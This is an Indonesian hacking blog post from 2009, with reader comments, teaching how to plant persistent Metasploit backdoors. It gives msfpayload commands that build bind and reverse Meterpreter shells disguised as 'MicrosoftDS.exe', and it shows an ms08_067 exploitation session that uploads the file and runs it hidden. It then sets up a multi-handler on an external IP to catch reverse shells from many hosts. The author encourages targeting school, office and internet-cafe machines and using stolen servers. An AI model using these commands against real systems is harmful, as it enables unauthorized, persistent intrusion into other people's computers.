Posted by kecoak on Feb 22, 2009

Metasploit: Backdooring

Categories: Tips and Trick, Tools Review | 14 comments

Mungkin sebagian sudah ada yang tahu bahwa metasploit dapat digunakan untuk membuat backdoor, pernah juga disinggung pada toket edisi new year 2009. Penggunaan backdoor ini sangat berguna terutama sebagai post-exploitation method. Pada contoh kali ini kita akan memanfaatkan 2 metode dasar mendapatkan shell dari target, yaitu bind_tcp dan reverse_tcp.

Untuk bind_tcp, backdoor akan dijalankan pada terget dimana target akan membuka port pada sistemnya sendiri. Sehingga setelah proses exploitasi selesai, kita dapat masuk kapan saja ke target dengan memanfaatkan port yang telah dibuka oleh backdoor tersebut.

$ ./msfpayload windows/meterpreter/bind_tcp LPORT=4321 RHOST=10.10.96.143 EXITFUNC=thread X > MicrosoftDS.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/bind_tcp
 Length: 307
Options: LPORT=4321,RHOST=10.10.96.143,EXITFUNC=thread

Backdoor tersebut akan membuka port 4321 pada target 10.10.96.143. Bagaimana proses menjalankan backdoor tersebut terserah kita, bisa jadi backdoor ditanam dan dijalankan setelah proses exploitasi selesai terhadap target seperti berikut:


msf exploit(ms08_067_netapi) > exploit

[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 0 / 1 - lang:English
[*] Selected Target: Windows XP SP0/SP1 Universal
[*] Triggering the vulnerability...
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] Meterpreter session 3 opened (10.10.97.14:31338 -> 10.10.96.143:4780)

meterpreter > cd 
meterpreter > pwd
C:
meterpreter > upload MicrosoftDS.exe
[*] uploading  : MicrosoftDS.exe -> MicrosoftDS.exe
[*] uploaded   : MicrosoftDS.exe -> MicrosoftDS.exe
meterpreter > execute -f MicrosoftDS.exe -H
Process 2348 created.

Pada saat berikutnya, kita dapat masuk ke mesin target tanpa melakukan exploitasi ulang, cukup dengan membuka koneksi pada port yang telah didefinisikan berikutnya.


msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(handler) > set LPORT 4321
LPORT => 4321
msf exploit(handler) > set RHOST 10.10.96.143
RHOST => 10.10.96.143
msf exploit(handler) > exploit

[*] Starting the payload handler...
[*] Started bind handler
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] Meterpreter session 2 opened (10.10.97.14:58798 -> 10.10.96.143:4321)

meterpreter >

Metode kedua menggunakan reverse shell, reverse shell digunakan terutama apabila network target dibatasi oleh firewall sehingga tidak bisa membuka koneksi ke semua port (tipikal internal network). Jadi jika kalian mendapatkan kesempatan untuk hacking ke salah satu mesin dalam internal network (misal: komputer sekolah, komputer kantor, komputer warnet, etc) serta tetap ingin mendapatkan akses shell tersebut kapanpun dan dimanapun bisa memanfaatkan multi-handler metasploit untuk menerima reverse shell. Kita bisa setup multi-handler di mesin-mesin yang dapat diakses dari manapun di internet, misalnya: mesin hosting, atau mesin server hasil rampokan, dsb.


msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > show options

Module options:

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  seh              yes       Exit technique: seh, thread, process
   LHOST                      yes       The local address
   LPORT     4444             yes       The local port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf exploit(handler) > set LPORT 53
LPORT => 53
msf exploit(handler) > set LHOST 222.124.199.76
LHOST => 222.124.199.76
msf exploit(handler) > set ExitOnSession false
msf exploit(handler) > exploit

[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler...

Selanjutnya tinggal buat backdoor dengan kategori reverse_shell:


$ ./msfpayload windows/meterpreter/reverse_tcp LPORT=53 LHOST=222.124.199.76 EXITFUNC=thread X > MicrosoftDS.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
 Length: 278
Options: LPORT=53,LHOST=222.124.199.76,EXITFUNC=thread
$ file MicrosoftDS.exe
MicrosoftDS.exe: MS-DOS executable PE  for MS Windows (GUI) Intel 80386 32-bit

Dan ketika dijalankan (dijalankan melalui sesi pasca exploitasi ataupun dijalankan secara manual lewat double-click mouse :P), pada multi-handler akan muncul:


[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler...
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] Meterpreter session 3 opened (222.124.199.76:53 -> 10.10.96.143:4831)

meterpreter >

Asyiknya menggunakan multi-handler metasploit adalah kita dapat memiliki banyak sessions sekaligus, untuk contoh diatas dapat dilihat satu multi-handler yang telah diset ExitOnSession==false dapat menghandle banyak reverse_shell sekaligus. Dan kita dapat berinteraksi dengan session-session tersebut kapanpun kita mau:


msf exploit(handler) > sessions -l

Active sessions
===============

  Id  Description  Tunnel
  --  -----------  ------
  3   Meterpreter  222.124.199.76:53 -> 10.10.96.146:4831
  4   Meterpreter  222.124.199.76:53 -> 10.10.96.223:4836
  5   Meterpreter  222.124.199.76:53 -> 10.10.96.215:4838
  6   Meterpreter  222.124.199.76:53 -> 172.16.96.143:4840
  7   Meterpreter  222.124.199.76:53 -> 172.16.96.143:4845
  8   Meterpreter  222.124.199.76:53 -> 172.16.96.143:4846
  9   Meterpreter  222.124.199.76:53 -> 172.16.96.143:4847

msf exploit(handler) > sessions -i 3
[*] Starting interaction with 3...
meterpreter > sysinfo
Computer: PROGWAR
OS      : Windows XP (Build 2600, ).

Itulah beberapa contoh pemanfaatan metasploit untuk backdooring, masih banyak contoh-contoh kreatif lainnya terutama yang berbau kiddies dan evil-in-mind. Oh iya, pada contoh diatas saya menggunakan payload meterpreter berkali-kali. Pembahasan tentang meterpreter akan dilakukan berikutnya.

Stay tuned *heh, serasa pembawa acara opera sabun*

Post a Comment

14 Responses to “Metasploit: Backdooring”

  1. csh says:
    February 23, 2009 at 4:15 pm

    There’s no such backdoor are better than Kakarlak’s ever
    http://www.geocities.com/byteskrew/kakarlak/

    Reply
  2. f4r1z says:
    February 24, 2009 at 10:08 am

    permisi numpang tanya mas2, aku ko g bisa upload MicrosoftDS.exe ya?pa tu backdoor kita download sendiri pa dah jadi satu sama msf yak?
    terima kasih
    ^_^

    Reply
  3. CyberTank says:
    February 24, 2009 at 10:22 am

    MicrosoftDS.exe itu dibuat dulu om..

    Reply
  4. f4r1z says:
    February 24, 2009 at 10:34 am

    o0o dibuat sendiri ya om, tq atas blesannya, he9 makasih langsung ditanggepin. mau searcing2 dulu buat MicrosoftDS.exe nya ^_^

    Reply
  5. CyberTank says:
    February 24, 2009 at 10:37 am

    itu diatas kan ada om

    Reply
  6. f4r1z says:
    February 24, 2009 at 11:02 am

    ya allah!! he9 maaf om, baru tau soalnya cara buat backdoor di msf gitu, sekalagi makasih banget! ^_^

    Reply
  7. aping says:
    April 10, 2009 at 2:30 am

    MicrosoftDS.exe

    diatas yang mana ya omm.. bingung.. 🙁

    Reply
  8. ronald says:
    November 1, 2009 at 12:17 pm

    mungkin maksudnya butuh filenya kali ya om?

    Reply
  9. capede says:
    December 4, 2009 at 8:53 pm

    msfpayload nya nge-stdout MicrosoftDS.exe kaleeee
    cuapcusss dee eikeeee, bikin gregetan ajaaa…hhh

    Reply
  10. kazukabe says:
    December 29, 2009 at 6:44 pm

    om carany buat MicrosoftDS.exe di windows itu gimana?? lewat command propt kah?? atw lewat….cli nya metasploit……. klo y a caranya masuk cli gmn……………

    Reply
  11. nunos says:
    January 26, 2010 at 1:45 am

    bingung belum pernh make sih minta tutorianya donk kirim ke e-mail “untuk awam”

    Reply
  12. RedPonny says:
    February 16, 2011 at 1:06 pm

    keknya jelas deh om²

    $ ./msfpayload windows/meterpreter/bind_tcp LPORT=4321 RHOST=10.10.96.143 EXITFUNC=thread X > MicrosoftDS.exe
    Created by msfpayload (http://www.metasploit.com).
    Payload: windows/meterpreter/bind_tcp
    Length: 307
    Options: LPORT=4321,RHOST=10.10.96.143,EXITFUNC=thread

    Tuh proses pembuatanya MicrosoftDS.exe jadi kog 🙂
    Nice Tutor om 🙂 sangat berguna hehehe..

    Reply
  13. SaMuR4i_X says:
    March 20, 2011 at 4:04 am

    ad lagi yang lebih enak bikin backdornya di browser IE di windows.
    tapi itu yang browser IE 5/6 untuk yang versi browser IE 9 blm coba kwkwkww….

    Reply
  14. 4G says:
    April 5, 2011 at 12:06 am

    klw sudah post exploitation., gw seringnya pake metsrv.exe bawaan metasploit sebagai backdoor..

    Reply

Trackbacks/Pingbacks

  1. Kecoak Elektronik Indonesia » .fun and profit with meterpreter. - [...] .so lets make ur choice kiddo,dengan mengacu sebelumnya pada artikel. [...]
  2. kopandakan.com » fun and profit with meterpreter - [...] .so lets make ur choice kiddo,dengan mengacu sebelumnya pada artikel. [...]
  3. Metasploit: Backdooring « Red Devils Penetration Testing - [...] : http://kecoak.org/log/2009/02/22/metasploit-backdooring/ Share this:TwitterFacebookLike this:LikeBe the first to like this [...]

Leave a Reply

Your email address will not be published. Required fields are marked *